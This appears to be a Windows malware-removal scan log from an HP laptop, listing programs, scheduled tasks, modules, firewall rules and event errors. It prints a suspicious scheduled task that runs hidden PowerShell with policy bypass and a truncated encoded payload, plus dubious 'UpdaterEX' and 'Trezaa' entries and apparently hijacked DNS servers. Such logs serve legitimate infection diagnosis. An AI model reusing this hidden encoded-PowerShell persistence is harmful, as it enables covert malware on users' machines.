Amazon Kindle (HKU\S-1-5-21-1042049586-4185267109-2020147840-1002\...\Amazon Kindle) (Version: 1.14.0.43019 - Amazon) AMD Catalyst Install Manager (HKLM\...\{A30D3EA3-B90A-DDD5-949E-6DDE67E64FE6}) (Version: 8.0.916.0 - Advanced Micro Devices, Inc.) AudibleManager (HKLM-x32\...\AudibleManager) (Version: 508.36643952.36635232.36643960 - Audible, Inc.) Avast SecureLine (HKLM\...\{2CD3C92F-EDC5-4B02-9B0A-9C1D37C58EF5}_is1) (Version: 1.0.239.2 - AVAST Software) Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.) Cisco EAP-FAST Module (HKLM-x32\...\{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}) (Version: 2.2.14 - Cisco Systems, Inc.) Cisco LEAP Module (HKLM-x32\...\{AF312B06-5C5C-468E-89B3-BE6DE2645722}) (Version: 1.0.19 - Cisco Systems, Inc.) Cisco PEAP Module (HKLM-x32\...\{0A4EF0E6-A912-4CDE-A7F3-6E56E7C13A2F}) (Version: 1.1.6 - Cisco Systems, Inc.) CyberLink PhotoDirector (HKLM-x32\...\InstallShield_{5A454EC5-217A-42a5-8CE1-2DDEC4E70E01}) (Version: 5.0.5.6713 - CyberLink Corp.) CyberLink PhotoDirector (Version: 5.0.5.6713 - CyberLink Corp.) Hidden CyberLink Power Media Player 14 (HKLM-x32\...\{32C8E300-BDB4-4398-92C2-E9B7D8A233DB}) (Version: 14.0.3.6129 - CyberLink Corp.) CyberLink PowerDirector 12 (HKLM-x32\...\InstallShield_{E1646825-D391-42A0-93AA-27FA810DA093}) (Version: 12.0.5.4601 - CyberLink Corp.) CyberLink PowerDirector 12 (Version: 12.0.5.4601 - CyberLink Corp.) Hidden CyberLink YouCam (HKLM-x32\...\{A9CEDD6E-4792-493e-BB35-D86D2E188A5A}) (Version: 6.0.1.4301 - CyberLink Corp.) DisableMSDefender (Version: 1.0.0 - Hewlett-Packard Company) Hidden Energy Star (HKLM\...\{465CA2B6-98AF-4E77-BE22-A908C34BB9EC}) (Version: 1.0.9 - Hewlett-Packard Company) Evernote v. 5.8.6 (HKLM-x32\...\{FEDC7C10-EF67-11E4-9B07-00505695D7B0}) (Version: 5.8.6.7519 - Evernote Corp.) 
Extended Update (HKU\S-1-5-21-1042049586-4185267109-2020147840-1002\...\UpdaterEX) (Version: - Extended Update) C:\Users\bbabq\AppData\Local\Microsoft\OneDrive\17.3.6302.0225\FileCoAuth.exe (Microsoft Corporation) ==================== Scheduled Tasks (Whitelisted) ============= (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) Task: {035F9A0E-F095-4926-8D7E-3677F91DDF28} - \UpdaterEX -> No File C:\WINDOWS\system32\regsvr32.exe [2015-10-30] (Microsoft Corporation) Task: {0EC61FD5-879C-4DC2-8F55-E1E5835D7568} - System32\Tasks\Avast SecureLine => C:\Program Files\AVAST Software\SecureLine\SecureLine.exe [2016-03-01] (AVAST Software) Task: {12B6513F-4597-4570-BB75-F7FFCF9D7C68} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker_DeviceScan => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2016-03-24] (HP Inc.) Task: {143F5EBF-DBD8-4720-A46E-3D58BE9BBFD3} - System32\Tasks\{0E047F47-0F0C-7809-0511-09090C09110C} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcA (the data entry has 9448 more characters). 
Task: {2EA0C586-5740-4ABF-A6E0-CAF1FF685C16} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-12-14] (Adobe Systems Incorporated) Task: {428CA93D-547E-4F19-8901-BC5D0F2D32C0} - System32\Tasks\Trezaa Scheduler => C:\Program Files [2016-04-03] () Task: {43EE6F95-16DF-482F-B72F-023B56302061} - System32\Tasks\HPCeeScheduleForbbabq => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2015-06-16] (Hewlett-Packard) Task: {4585E528-3EE6-4D7C-977A-8ACA7839C34B} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2016-02-18] (Hewlett-Packard Company) Task: {5AB86702-F6A4-4FA0-A308-CAF0B0ABDBFC} - System32\Tasks\McAfeeLogon => C:\Program Files\Common Files\McAfee\platform\McUICnt.exe [2015-11-02] (McAfee, Inc.) Task: {5EFBCBC4-EA36-4660-B94B-5449F2760C3A} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2016-03-07] (Hewlett-Packard) Task: {661CB389-8769-4009-8781-35756EFB1C77} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-01-30] (Google Inc.) 
Task: {67DAA743-4F85-42FD-AA7A-CE1D816B6B88} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSFReport.exe [2016-03-11] (Hewlett-Packard) Task: {6AF8D662-D9D8-4141-B406-53A51AE36995} - System32\Tasks\McAfee\McAfee Idle Detection Task Task: {70E4B28B-305E-4D75-8579-4090965AF345} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Active Health Launcher => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPActiveHealth\ActiveHealth.exe [2016-03-02] (Hewlett-Packard) Task: {75FFF643-CCF2-4DFF-90BA-B954114EC2E4} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2016-03-24] (HP Inc.) Task: {766A10C9-0513-4949-87F7-2FDDB803D151} - System32\Tasks\Adobe Flash Player Updater => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-03-23] (Adobe Systems Incorporated) Task: {76F20A60-E5A4-4EE8-928D-D000D229AB37} - System32\Tasks\avast! SL Update => C:\Program Files\AVAST Software\SecureLine\SLUpdate.exe [2016-03-01] (AVAST Software) Task: {771111C8-F5B5-40E0-9EF4-8C6B5E0F6769} - System32\Tasks\WpsUpdateTask_Administrator => C:\Program Files (x86)\Kingsoft\WPS Office\9.1.0.5113\wtoolex\wpsupdate.exe [2015-12-01] (Zhuhai Kingsoft Office Software Co.,Ltd) Task: {82455775-2BE5-439D-A053-402B4383CDC3} - System32\Tasks\YCMServiceAgent => C:\Program Files (x86)\CyberLink\YouCam6\YouCamService6.exe [2015-07-01] (CyberLink Corp.) 
Task: {8AF461FD-E7E7-42B6-8637-BFDDE7CD891C} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2016-02-18] (Hewlett-Packard Company) Task: {8CD1BE1D-05AD-4F9D-BAD0-51C4DA985F91} - System32\Tasks\Hewlett-Packard\HP Active Health\HP Active Health Scan (HPSA) => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPActiveHealth\ActiveHealth.exe [2016-03-02] (Hewlett-Packard) Task: {A1B5F412-B13F-4BA4-9110-2270D7080E7D} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-01-30] (Google Inc.) Task: {A49447BA-1532-4B02-BDDA-FC7475268E38} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-03-08] (Microsoft Corporation) Task: {D28505B7-AD59-48CC-9228-F0F235526484} - System32\Tasks\McAfee\McAfee Auto Maintenance Task Agent Task: {D5462382-9816-4CF6-A34C-4971E4F51383} - System32\Tasks\WpsNotifyTask_Administrator => C:\Program Files (x86)\Kingsoft\WPS Office\9.1.0.5113\wtoolex\wpsnotify.exe [2015-12-01] (Zhuhai Kingsoft Office Software Co.,Ltd) (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.) 
Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\WINDOWS\Tasks\HPCeeScheduleForbbabq.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe Task: C:\WINDOWS\Tasks\UpdaterEX.job => Task: C:\WINDOWS\Tasks\WpsNotifyTask_Administrator.job => C:\Program Files (x86)\Kingsoft\WPS Office\9.1.0.5113\wtoolex\wpsnotify.exe Task: C:\WINDOWS\Tasks\WpsUpdateTask_Administrator.job => C:\Program Files (x86)\Kingsoft\WPS Office\9.1.0.5113\wtoolex\wpsupdate.exe ==================== Shortcuts ============================= (The entries could be listed to be restored or removed.) ShortcutWithArgument: C:\Users\bbabq\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\AmazonShopping.lnk -> C:\Program Files (x86)\Hewlett-Packard\Shared\WizLink.exe () -> hxxp://www.amazon.com/gp/bit/amazonbookmark.html?tag=hp2-desktop-us-20&partner=HP ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Priceline.com.lnk -> C:\Program Files (x86)\Hewlett-Packard\Shared\WizLink.exe () -> hxxp://www.priceline.com/?refid=PLHBC6240OPQ&refclickid=square ==================== Loaded Modules (Whitelisted) ============== 2015-08-06 23:39 - 2015-08-06 23:39 - 00127488 _____ () c:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Container.Wlan.dll 2016-03-01 12:01 - 2016-03-01 12:01 - 00465088 _____ () C:\Program Files\AVAST Software\SecureLine\VpnSvc.exe 2016-02-06 12:50 - 2014-04-14 19:59 - 00389896 _____ () C:\Program Files\CyberLink\Shared files\RichVideo64.exe 2015-10-30 01:18 - 2015-10-30 01:18 - 00185856 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll 2016-03-01 16:09 - 2016-02-23 05:27 - 02654872 _____ () C:\WINDOWS\system32\CoreUIComponents.dll 2016-03-01 
16:09 - 2016-02-23 05:27 - 02654872 _____ () C:\WINDOWS\System32\CoreUIComponents.dll 2016-01-29 05:57 - 2016-01-29 05:57 - 00093696 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\Windows.UI.Shell.SharedUtilities.dll 2016-03-01 16:08 - 2016-02-23 02:36 - 00472064 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll 2016-01-29 05:57 - 2016-01-29 05:57 - 00591360 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll 2016-01-29 18:21 - 2016-01-29 18:22 - 00144384 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeHost.exe 2016-01-29 05:57 - 2016-01-29 05:57 - 07992832 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll 2016-01-29 05:57 - 2016-01-29 05:57 - 00936960 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Actions.dll 2016-01-29 05:57 - 2016-01-29 05:57 - 02483200 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll 2016-01-29 05:57 - 2016-01-29 05:57 - 04089856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll 2016-01-29 05:57 - 2016-01-29 05:57 - 00529408 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.NodeWinrtWrap.dll 2015-10-30 01:18 - 2015-10-30 03:07 - 00037888 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\dss_service\node_modules\winrt-projections\bin\Winrt_Projections.node 2015-10-30 01:18 - 2015-10-30 03:06 - 00796160 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\dss_service\node_modules\windows.web.http\bin\NodeRT_Windows_Web_Http.node 2015-10-30 01:18 - 2015-10-30 03:07 - 00961024 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\dss_service\node_modules\windows.web.http.headers\bin\NodeRT_Windows_Web_Http_Headers.node 2015-10-30 01:18 - 2015-10-30 03:06 - 00206336 _____ () 
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\dss_service\node_modules\windows.web.http.filters\bin\NodeRT_Windows_Web_Http_Filters.node 2015-10-30 01:18 - 2015-10-30 03:06 - 00558592 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\dss_service\node_modules\windows.storage.streams\bin\NodeRT_Windows_Storage_Streams.node 2015-10-30 01:18 - 2015-10-30 03:07 - 00397824 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\dss_service\node_modules\windows.foundation\bin\NodeRT_Windows_Foundation.node 2015-10-30 01:18 - 2015-10-30 03:06 - 00181248 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\dss_service\node_modules\nodert-buffer-utils\bin\NodeRT_Buffer_Utils.node 2015-10-30 01:18 - 2015-10-30 03:06 - 00093696 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\dss_service\node_modules\windows.security.cryptography\bin\NodeRT_Windows_Security_Cryptography.node 2015-10-30 01:18 - 2015-10-30 03:06 - 00200192 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\dss_service\node_modules\windows.cortana.pal\bin\NodeRT_Windows_Cortana_PAL.node 2016-03-01 12:01 - 2016-03-01 12:01 - 38907672 _____ () C:\Program Files\AVAST Software\SecureLine\libcef.dll 2016-01-29 18:21 - 2016-01-29 18:22 - 00141312 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeBackgroundTasks.dll 2016-01-29 18:21 - 2016-01-29 18:22 - 22330368 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkyWrap.dll 2016-04-02 13:28 - 2016-04-02 13:28 - 01114136 _____ () C:\Users\bbabq\AppData\Roaming\Mozilla\Firefox\Profiles\txalcbov.default-1459625056742\extensions\support@lastpass.com\platform\WINNT_x86-msvc\components\lpxpcom.dll ==================== Alternate Data Streams (Whitelisted) ========= (If an entry is included in the fixlist, only the ADS will be removed.) 
==================== Safe Mode (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.) HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""="" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McNaiAnn => ""="" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfemms => ""="Service" ==================== EXE Association (Whitelisted) =============== (If an entry is included in the fixlist, the registry item will be restored to default or removed.) ==================== Internet Explorer trusted/restricted =============== (If an entry is included in the fixlist, it will be removed from the registry.) ==================== Hosts content: =============================== (If needed Hosts: directive could be included in the fixlist to reset Hosts.) 2015-07-10 05:04 - 2016-02-06 11:57 - 00000824 ____A C:\WINDOWS\system32\Drivers\etc\hosts ==================== Other Areas ============================ (Currently there is no automatic fix for this section.) HKU\S-1-5-21-1042049586-4185267109-2020147840-1002\Control Panel\Desktop\\Wallpaper -> DNS Servers: 82.163.142.7 - 95.211.158.134 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) Windows Firewall is enabled. ==================== MSCONFIG/TASK MANAGER disabled items == (Currently there is no automatic fix for this section.) 
HKLM\...\StartupApproved\Run: => "Logitech Download Assistant" HKU\S-1-5-21-1042049586-4185267109-2020147840-1002\...\StartupApproved\Run: => "OneDrive" ==================== FirewallRules (Whitelisted) =============== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139 FirewallRules: [{FDAEBCB3-F5A9-42F7-8C3F-39D78E0ABEEC}] => (Allow) C:\Program Files (x86)\Trezaa\Trezaa.Service.exe FirewallRules: [{42EEF81F-4C9A-4DDC-84BA-F20839A8442C}] => (Allow) c:\Program Files\CyberLink\PowerDirector12\PDR10.EXE FirewallRules: [{6521111C-920B-4760-AFD8-5152E76594E5}] => (Allow) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe FirewallRules: [{4E603F95-AB34-4911-B4C0-B39536C8885E}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPSOCKSVC.exe FirewallRules: [{AC51C347-7E4E-4ADD-B48A-B55B73354012}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe FirewallRules: [{9252EA31-7C72-41FD-9653-B80BA4EE3758}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe FirewallRules: [{A8843FF4-C01E-462A-9467-8652C31CF1CF}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe FirewallRules: [{160B6ECD-45D8-49C5-AB7C-BC8E8584D976}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe FirewallRules: [{ADDAC2C0-2AEE-4CF7-85C3-5C58B56C1CA2}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{F8FB2788-6856-4F2C-B309-EF7B6F18C838}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{D110CFC2-E1C0-485B-A1A7-046B980AD4C8}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe FirewallRules: [{7846F584-5E55-4485-AD66-8BC48C57602F}] => (Allow) C:\Program Files\CyberLink\PowerDirector12\PDR10.EXE FirewallRules: [{8D0992F6-4987-46C4-BF0F-A1EEC2BAEF05}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe FirewallRules: 
[{4FD7FD7C-E74C-484D-A974-2E161EE94813}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD14\PowerDVD.exe FirewallRules: [{FE6B793B-655B-4455-B65F-547A7DDEB41F}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD14\Kernel\DMS\CLMSServerPDVD14.exe FirewallRules: [{4089EE43-D108-44D0-BC72-408C6A3E1607}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD14\PowerDVD14Agent.exe FirewallRules: [{B48B0DE3-DE8B-4D77-81EB-461475AC00B6}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD14\Movie\PowerDVDMovie.exe FirewallRules: [{E5CE62D6-4261-4E2A-A591-A90EC152F2F7}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD14\Movie\PowerDVD Cinema\PowerDVDCinema.exe ==================== Restore Points ========================= 14-03-2016 17:48:29 HPSF Applying updates 22-03-2016 18:28:36 Windows Update 02-04-2016 10:14:30 HPSF Applying updates 03-04-2016 10:46:44 AA11 ==================== Faulty Device Manager Devices ============= ==================== Event log errors: ========================= Application errors: ================== Error: (04/03/2016 01:37:50 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-N1B6HJU) Description: Activation of app Weather.TheWeatherChannelforHP_t3yemqpq4kp7p!App failed with error: -2144927148 See the Microsoft-Windows-TWinUI/Operational log for additional information. Error: (04/03/2016 01:13:50 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-N1B6HJU) Description: Activation of app Weather.TheWeatherChannelforHP_t3yemqpq4kp7p!App failed with error: -2144927148 See the Microsoft-Windows-TWinUI/Operational log for additional information. Error: (04/03/2016 01:07:47 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-N1B6HJU) Description: Activation of app Weather.TheWeatherChannelforHP_t3yemqpq4kp7p!App failed with error: -2144927148 See the Microsoft-Windows-TWinUI/Operational log for additional information. 
Error: (04/03/2016 12:46:00 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-N1B6HJU) Description: Activation of app Weather.TheWeatherChannelforHP_t3yemqpq4kp7p!App failed with error: -2144927148 See the Microsoft-Windows-TWinUI/Operational log for additional information. Error: (04/03/2016 12:37:47 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-N1B6HJU) Description: Activation of app Weather.TheWeatherChannelforHP_t3yemqpq4kp7p!App failed with error: -2144927148 See the Microsoft-Windows-TWinUI/Operational log for additional information. Error: (04/03/2016 12:21:05 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-N1B6HJU) Description: Activation of app Weather.TheWeatherChannelforHP_t3yemqpq4kp7p!App failed with error: -2144927148 See the Microsoft-Windows-TWinUI/Operational log for additional information. Error: (04/03/2016 12:07:56 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-N1B6HJU) Description: Activation of app Weather.TheWeatherChannelforHP_t3yemqpq4kp7p!App failed with error: -2144927148 See the Microsoft-Windows-TWinUI/Operational log for additional information. Error: (04/03/2016 11:52:53 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-N1B6HJU) Description: Activation of app Weather.TheWeatherChannelforHP_t3yemqpq4kp7p!App failed with error: -2144927148 See the Microsoft-Windows-TWinUI/Operational log for additional information. Error: (04/03/2016 11:31:04 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-N1B6HJU) Description: Activation of app Weather.TheWeatherChannelforHP_t3yemqpq4kp7p!App failed with error: -2144927148 See the Microsoft-Windows-TWinUI/Operational log for additional information. 
Error: (04/03/2016 11:23:01 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-N1B6HJU) Description: Activation of app Weather.TheWeatherChannelforHP_t3yemqpq4kp7p!App failed with error: -2144927148 See the Microsoft-Windows-TWinUI/Operational log for additional information. System errors: ============= Error: (04/03/2016 01:39:02 PM) (Source: DCOM) (EventID: 10016) (User: DESKTOP-N1B6HJU) Description: machine-defaultLocalActivation{C2F03A33-21F5-47FA-B4BB-156362A2F239}{316CDED5-E4AE-4B15-9113-7055D84DCC97}DESKTOP-N1B6HJUbbabqS-1-5-21-1042049586-4185267109-2020147840-1002LocalHost (Using LRPC)Microsoft.Windows.Cortana_1.6.1.52_neutral_neutral_cw5n1h2txyewyS-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742 Error: (04/03/2016 01:39:02 PM) (Source: DCOM) (EventID: 10016) (User: DESKTOP-N1B6HJU) Description: machine-defaultLocalActivation{C2F03A33-21F5-47FA-B4BB-156362A2F239}{316CDED5-E4AE-4B15-9113-7055D84DCC97}DESKTOP-N1B6HJUbbabqS-1-5-21-1042049586-4185267109-2020147840-1002LocalHost (Using LRPC)Microsoft.Windows.Cortana_1.6.1.52_neutral_neutral_cw5n1h2txyewyS-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742 Error: (04/03/2016 01:39:02 PM) (Source: DCOM) (EventID: 10016) (User: DESKTOP-N1B6HJU) Description: machine-defaultLocalActivation{C2F03A33-21F5-47FA-B4BB-156362A2F239}{316CDED5-E4AE-4B15-9113-7055D84DCC97}DESKTOP-N1B6HJUbbabqS-1-5-21-1042049586-4185267109-2020147840-1002LocalHost (Using LRPC)Microsoft.Windows.Cortana_1.6.1.52_neutral_neutral_cw5n1h2txyewyS-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742 Error: (04/03/2016 01:39:02 PM) (Source: DCOM) (EventID: 10016) (User: DESKTOP-N1B6HJU) Description: machine-defaultLocalActivation{C2F03A33-21F5-47FA-B4BB-156362A2F239}{316CDED5-E4AE-4B15-9113-7055D84DCC97}DESKTOP-N1B6HJUbbabqS-1-5-21-1042049586-4185267109-2020147840-1002LocalHost (Using 
LRPC)Microsoft.Windows.Cortana_1.6.1.52_neutral_neutral_cw5n1h2txyewyS-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742 Error: (04/03/2016 12:54:01 PM) (Source: DCOM) (EventID: 10016) (User: DESKTOP-N1B6HJU) Description: machine-defaultLocalActivation{C2F03A33-21F5-47FA-B4BB-156362A2F239}{316CDED5-E4AE-4B15-9113-7055D84DCC97}DESKTOP-N1B6HJUbbabqS-1-5-21-1042049586-4185267109-2020147840-1002LocalHost (Using LRPC)Microsoft.Windows.Cortana_1.6.1.52_neutral_neutral_cw5n1h2txyewyS-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742 Error: (04/03/2016 12:54:01 PM) (Source: DCOM) (EventID: 10016) (User: DESKTOP-N1B6HJU) Description: machine-defaultLocalActivation{C2F03A33-21F5-47FA-B4BB-156362A2F239}{316CDED5-E4AE-4B15-9113-7055D84DCC97}DESKTOP-N1B6HJUbbabqS-1-5-21-1042049586-4185267109-2020147840-1002LocalHost (Using LRPC)Microsoft.Windows.Cortana_1.6.1.52_neutral_neutral_cw5n1h2txyewyS-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742 Error: (04/03/2016 12:37:52 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY) Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable Error: (04/03/2016 12:18:21 PM) (Source: DCOM) (EventID: 10016) (User: DESKTOP-N1B6HJU) Description: machine-defaultLocalActivation{C2F03A33-21F5-47FA-B4BB-156362A2F239}{316CDED5-E4AE-4B15-9113-7055D84DCC97}DESKTOP-N1B6HJUbbabqS-1-5-21-1042049586-4185267109-2020147840-1002LocalHost (Using LRPC)Microsoft.Windows.Cortana_1.6.1.52_neutral_neutral_cw5n1h2txyewyS-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742 Error: (04/03/2016 12:18:21 PM) (Source: DCOM) (EventID: 10016) (User: DESKTOP-N1B6HJU) Description: 
machine-defaultLocalActivation{C2F03A33-21F5-47FA-B4BB-156362A2F239}{316CDED5-E4AE-4B15-9113-7055D84DCC97}DESKTOP-N1B6HJUbbabqS-1-5-21-1042049586-4185267109-2020147840-1002LocalHost (Using LRPC)Microsoft.Windows.Cortana_1.6.1.52_neutral_neutral_cw5n1h2txyewyS-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742 Error: (04/03/2016 12:18:21 PM) (Source: DCOM) (EventID: 10016) (User: DESKTOP-N1B6HJU) Description: machine-defaultLocalActivation{C2F03A33-21F5-47FA-B4BB-156362A2F239}{316CDED5-E4AE-4B15-9113-7055D84DCC97}DESKTOP-N1B6HJUbbabqS-1-5-21-1042049586-4185267109-2020147840-1002LocalHost (Using LRPC)Microsoft.Windows.Cortana_1.6.1.52_neutral_neutral_cw5n1h2txyewyS-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742 CodeIntegrity: =================================== Date: 2016-04-03 10:37:56.557 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system. Date: 2016-03-31 05:37:03.861 Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements. Date: 2016-03-31 05:37:03.784 Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements. Date: 2016-03-29 15:00:50.990 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system. 
